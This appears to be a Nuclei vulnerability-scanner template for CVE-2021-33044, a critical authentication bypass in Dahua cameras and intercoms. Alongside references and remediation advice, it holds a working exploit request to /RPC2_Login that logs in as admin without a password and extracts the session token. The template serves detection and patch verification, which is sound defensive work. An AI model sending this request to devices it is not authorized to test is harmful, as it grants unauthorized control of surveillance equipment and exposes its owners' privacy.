id: CVE-2021-33044 info: name: Dahua IPC/VTH/VTO - Authentication Bypass author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. impact: | An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system. remediation: | Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/support/cybersecurity/details/957 - https://github.com/bp2008/DahuaLoginBypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.30359 epss-percentile: 0.96948 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity http: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}} {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} matchers-condition: and matchers: - type: word part: body words: - '"result":true' - 'id' - 'params' - 'session' condition: and - type: status status: - 200 extractors: - type: regex group: 1 regex: - ',"result":true,"session":"([a-z]+)"\}' part: body # digest: 4a0a00473045022100e0608c5537bcf8b5dfaa512dd8755999f45853416be5f28fd5fe3d69d1cb0cdb02203c35616fdd4645b3cfabbc72041a76cd8838bfa9e167a07faf46f814791d4a20:922c64590222798bb761d5b6d8e72950